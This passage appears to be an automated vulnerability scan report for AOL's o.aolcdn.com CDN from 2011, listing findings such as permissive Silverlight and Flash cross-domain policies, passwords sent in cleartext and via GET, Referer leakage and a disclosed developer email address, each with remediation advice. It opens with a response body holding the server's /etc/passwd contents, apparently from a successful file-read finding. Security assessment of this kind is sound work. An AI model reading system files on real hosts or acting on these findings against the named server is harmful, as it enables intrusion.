User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Fri, 06 May 2011 01:12:53 GMT
Date: Thu, 05 May 2011 01:12:53 GMT
Connection: close
Content-Length: 20992

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/bin/false
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL da
...[SNIP]...

3. Silverlight cross-domain policy  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: o.aolcdn.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "d8baf0f1b81f70a7f23356194f1356bd:1219856443"
Last-Modified: Wed, 27 Aug 2008 17:00:43 GMT
Content-Type: application/xml
Cache-Control: max-age=1209600
Expires: Thu, 19 May 2011 00:56:50 GMT
Date: Thu, 05 May 2011 00:56:50 GMT
Content-Length: 338
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4. Cleartext submission of password  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /art/merge/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

Request

GET /art/merge/?f=/mobileportal/s2c_modal.js&f=/mobileportal/mobile_s2c_init.js&f=/feedback/feedback1.js&f=/mobileportal/mobileblog_profile.js&xpsec=31536000&ver=1y HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/?icid=prodserv_mobile_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Fri, 06 May 2011 00:58:27 GMT
Date: Thu, 05 May 2011 00:58:27 GMT
Connection: close
Content-Length: 27714

eval(function ($) {
$.modal = function (data, options) {
return $.modal.impl.init(data, options);
};
$.modal.close = function () {
$.modal.impl.close(true);
};
$.fn
...[SNIP]...
</span><form name="login" onsubmit="profileLogin(); return false;"><label for="confirmpassword">
...[SNIP]...
</label><input type="password" name="confirmpassword" id="pwLogin" /><input id="loginButton" type="submit" onClick="profileLogin();" value="Login">
...[SNIP]...

5. Flash cross-domain policy  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.0
Host: o.aolcdn.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "86252e13a238a19354a0bc819378c538:1294158341"
Last-Modified: Tue, 04 Jan 2011 16:25:41 GMT
Content-Type: application/xml
Cache-Control: max-age=1017380
Expires: Mon, 16 May 2011 19:33:10 GMT
Date: Thu, 05 May 2011 00:56:50 GMT
Content-Length: 3059
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSc
...[SNIP]...
<allow-access-from domain="*.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.web.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.my.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="channelevents.estage.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="channelevents.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.office.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="startpage.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="cdn.digitalcity.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="progressive.stream.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.video.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.video.office.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="publishing.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.publishing.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.tmz.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="tmz.warnerbros.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="goldrush.aol.com" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="stage.goldrush.aol.com" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="*.facebook.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.platformaprojects.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.yourminis.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lightningcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adtechus.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.atwola.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.rtm.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.advertising.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ad-preview.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.domanistudios.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.domanistudios.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.icq.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="studionow.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.studionow.com" secure="false"/>
...[SNIP]...

6. Password field submitted using GET method  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /art/merge/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /art/merge/?f=/mobileportal/s2c_modal.js&f=/mobileportal/mobile_s2c_init.js&f=/feedback/feedback1.js&f=/mobileportal/mobileblog_profile.js&xpsec=31536000&ver=1y HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/?icid=prodserv_mobile_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Fri, 06 May 2011 00:58:27 GMT
Date: Thu, 05 May 2011 00:58:27 GMT
Connection: close
Content-Length: 27714

eval(function ($) {
$.modal = function (data, options) {
return $.modal.impl.init(data, options);
};
$.modal.close = function () {
$.modal.impl.close(true);
};
$.fn
...[SNIP]...
</span><form name="login" onsubmit="profileLogin(); return false;"><label for="confirmpassword">
...[SNIP]...
</label><input type="password" name="confirmpassword" id="pwLogin" /><input id="loginButton" type="submit" onClick="profileLogin();" value="Login">
...[SNIP]...

7. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /art/merge/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /art/merge/?f=/mobileportal/s2c_modal.js&f=/mobileportal/mobile_s2c_init.js&f=/feedback/feedback1.js&f=/mobileportal/mobileblog_profile.js&xpsec=31536000&ver=1y HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/?icid=prodserv_mobile_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Fri, 06 May 2011 00:58:27 GMT
Date: Thu, 05 May 2011 00:58:27 GMT
Connection: close
Content-Length: 27714

eval(function ($) {
$.modal = function (data, options) {
return $.modal.impl.init(data, options);
};
$.modal.close = function () {
$.modal.impl.close(true);
};
$.fn
...[SNIP]...
</span><form name="login" onsubmit="profileLogin(); return false;"><label for="confirmpassword">
...[SNIP]...
</label><input type="password" name="confirmpassword" id="pwLogin" /><input id="loginButton" type="submit" onClick="profileLogin();" value="Login">
...[SNIP]...

8. Cross-domain Referer leakage  previous  next
There are 4 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


8.1. http://o.aolcdn.com/art/merge/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /art/merge/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /art/merge/?f=/fanhouse/design/v2/scripts/origin/jquery-cookie.min.js&f=/fanhouse/design/v2/scripts/origin/common.min.js&f=/fanhouse/design/v2/scripts/origin/common_orig.min.js HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Fri, 06 May 2011 00:57:19 GMT
Date: Thu, 05 May 2011 00:57:19 GMT
Connection: close
Content-Length: 68145

jQuery.cookie=function(name,value,options){if(typeof value!='undefined'){options=options||{};if(value===null){value='';options.expires=-1}var expires='';if(options.expires&&(typeof options.expires=='n
...[SNIP]...
tion intializeSeq(){initVidHTML=vidArray[0];document.getElementById('video').innerHTML=initVidHTML;}
function handleUpdate(){theHTML='';initHTML='';viewAllHTML='';switch(tabtopic){case 0:viewAllHTML+='<a href="http://video.aol.com/video-search/query/category%3A%22News%22%20channel%3A%22AOL%20News%22%20sort%3AmostRecent%20distributor%3A%22AP%22/familyFilter/0" target="_blank">See all AP Videos</a>';break;case 1:viewAllHTML+='<a href="http://video.aol.com/video-search/query/category%3A%22News%22%20channel%3A%22AOL%20News%22%20sort%3AmostRecent%20distributor%3A%22CNN%22/familyFilter/0" target="_blank">See all CNN Videos</a>';break;case 3:viewAllHTML+='<a href="http://video.aol.com/video-search/query/category%3A%22News%22%20channel%3A%22AOL%20News%22%20sort%3AmostRecent%20distributor%3A%22CBS%22/familyFilter/0" target="_blank">See all CBS Videos</a>';break;case 2:viewAllHTML+='<a href="http://video.aol.com/video-search/query/category%3A%22News%22%20channel%3A%22AOL%20News%22%20sort%3AmostRecent%20distributor%3A%22Reuters%22/familyFilter/0" target="_blank">See all Reuters Videos</a>
...[SNIP]...

8.2. http://o.aolcdn.com/os/mobile-desktop/js/mobileblog.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /os/mobile-desktop/js/mobileblog.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /os/mobile-desktop/js/mobileblog.js?v=1 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/?icid=prodserv_mobile_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 19 Apr 2011 04:17:01 GMT
Content-Type: application/javascript
Cteonnt-Length: 13447
Cache-Control: public, max-age=3600
Expires: Thu, 05 May 2011 01:58:28 GMT
Date: Thu, 05 May 2011 00:58:28 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 13447

//DL Rotator
var SLIDE_pic = new Array();
var SLIDE_load = new Array();
var SLIDE_link = new Array();
var SLIDE_status, SLIDE_timeout;
var SLIDE_actual = 0;
var SLIDE_speed = 5000;
var SLIDE_fa
...[SNIP]...
<li class="GH_hat_LI"><a href="http://my.screenname.aol.com/_cqr/logout/mcLogout.psp" class="jSignOut GH_hat_more" id="aol-header-login" title="Sign Out">Sign Out</a>
...[SNIP]...

8.3. http://o.aolcdn.com/os_merge/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /os_merge/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /os_merge/?file=/aol/jquery-1.4.4.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.addthis.min.js&file=/aol/jquery.aolphotogallery-1.0.min.js HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Fri, 08 Apr 2011 03:07:54 GMT
Content-Type: application/javascript
Cache-Control: public, max-age=2592000
Expires: Sat, 04 Jun 2011 00:57:19 GMT
Date: Thu, 05 May 2011 00:57:19 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 108673

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
</a>',facebook:'<a class="aol-share-facebook" href="http://www.facebook.com/sharer.php?u={{url}}&amp;t={{title}}" target="_blank" title="Share on Facebook">Share on Facebook</a>',twitter:'<a class="aol-share-twitter" href="http://twitter.com/share?url={{url}}&amp;text={{title}}&amp;via=AOL" target="_blank" title="Share on Twitter">Share on Twitter</a>',digg:'<a class="aol-share-digg" href="http://digg.com/submit?url={{url}}&amp;title={{title}}&amp;description={{desc}}" target="_blank" title="Share on Digg">Share on Digg</a>',lifestream:'<a class="aol-share-lifestream" href="http://lifestream.aol.com/share/?url={{url}}&amp;title={{title}}&amp;description={{desc}}" target="_blank" title="Share on Lifestream">Share on Lifestream</a>
...[SNIP]...

8.4. http://o.aolcdn.com/os_merge/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /os_merge/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /os_merge/?file=/df/js/jquery.globalheader-1.3.js&file=/df/js/jquery.globalsearchbox-1.3.js&file=/df/js/df-search0.6.js&file=/df/js/jslib1.5.js&file=/df/smartbox1.7.4.js HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 27 Apr 2011 15:07:57 GMT
Content-Type: application/javascript
Cache-Control: public, max-age=3600
Expires: Thu, 05 May 2011 01:58:35 GMT
Date: Thu, 05 May 2011 00:58:35 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 59226

/*
   name : globalHeader
   file : jquery.globalheader.js
   author : Ali Hasan
   (c) Copyright 2009 AOL LLC
   $LastChangedDate: 2009-11-24 08:30:32 -0500 (Tue, 24 Nov 2009) $
   $Rev: 134091 $
*/
(function(a)
...[SNIP]...
in","toolbar=no, menubar=no, resizable=no, location=no, directories=no, scrollbars=yes, width=802, height=604")};qp.common.breadcrumbs=function(){sURL=new String;bits=new Object;var a=0;var c=0;var b='<a href="http://money.aol.com">Money & Finance</a> &#187; <a href="http://money.aol.com/investing">Investing</a>
...[SNIP]...

9. Cross-domain script include  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /os/df/js/copyRight.js

Issue detail

The response dynamically includes the following script from another domain:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

Request

GET /os/df/js/copyRight.js HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 27 Apr 2011 15:23:30 GMT
Content-Type: application/javascript
Cteonnt-Length: 4448
Cache-Control: public, max-age=3600
Expires: Thu, 05 May 2011 01:58:16 GMT
Date: Thu, 05 May 2011 00:58:16 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4448

if(!Surphace){var Surphace={}}Surphace.copyRightSiteTitle=null;Surphace.copyRightOutputJQuery=false;Surphace.copyRightIncludeJQuery=function(){try{if(typeof(jQuery)=="undefined"){if(!Surphace.copyRightOutputJQuery){Surphace.copyRightOutputJQuery=true;document.write('<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.0/jquery.min.js"><\/script>
...[SNIP]...

10. Email addresses disclosed  previous  next
There are 3 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


10.1. http://o.aolcdn.com/art/webwidgets/sfsw_v1_3/feeds_subscribe_en_us.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /art/webwidgets/sfsw_v1_3/feeds_subscribe_en_us.js

Issue detail

The following email address was disclosed in the response:

Request

GET /art/webwidgets/sfsw_v1_3/feeds_subscribe_en_us.js HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/radioguide/bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 13 Oct 2007 03:39:09 GMT
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=2592000
Expires: Sat, 04 Jun 2011 00:56:51 GMT
Date: Thu, 05 May 2011 00:56:51 GMT
Connection: close
Content-Length: 29727

/*
-- AOL Standard Feed Subscribe Widget --
Author: Miodrag Kekic (miodrag.kekic@corp.aol.com)

Credits:
Dom object is based on Yahoo UILib YAHOO.util.Dom version 0.11.1
Copyright (c) 2006, Yahoo! Inc. All rights reserved.
License: http://developer.yahoo.net/yui/license.txt
*/

n
...[SNIP]...

10.2. http://o.aolcdn.com/os/df/js/feeds_subscribe_en_us.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /os/df/js/feeds_subscribe_en_us.js

Issue detail

The following email address was disclosed in the response:

Request

GET /os/df/js/feeds_subscribe_en_us.js HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 27 Apr 2011 15:54:12 GMT
Content-Type: application/javascript
Cteonnt-Length: 29727
Cache-Control: public, max-age=3600
Expires: Thu, 05 May 2011 01:58:16 GMT
Date: Thu, 05 May 2011 00:58:16 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 29727

/*
-- AOL Standard Feed Subscribe Widget --
Author: Miodrag Kekic (miodrag.kekic@corp.aol.com)

Credits:
Dom object is based on Yahoo UILib YAHOO.util.Dom version 0.11.1
Copyright (c) 2006, Yahoo! Inc. All rights reserved.
License: http://developer.yahoo.net/yui/license.txt
*/

n
...[SNIP]...

10.3. http://o.aolcdn.com/os_merge/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /os_merge/

Issue detail

The following email address was disclosed in the response:

Request

GET /os_merge/?file=/aol/jquery-1.4.2.min.js&file=/aol/jquery.globalheader-1.4.js&file=/aol/jquery.globalsearchbox-1.2.js&file=/aol/jquery.openwindow-1.0.js&file=/aol/jquery.truncate-1.0.js&file=/aol/jquery.multiauth-1.0.min.js&file=/aol/jquery.openwindow-1.0.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&os=4 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/?icid=prodserv_mobile_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
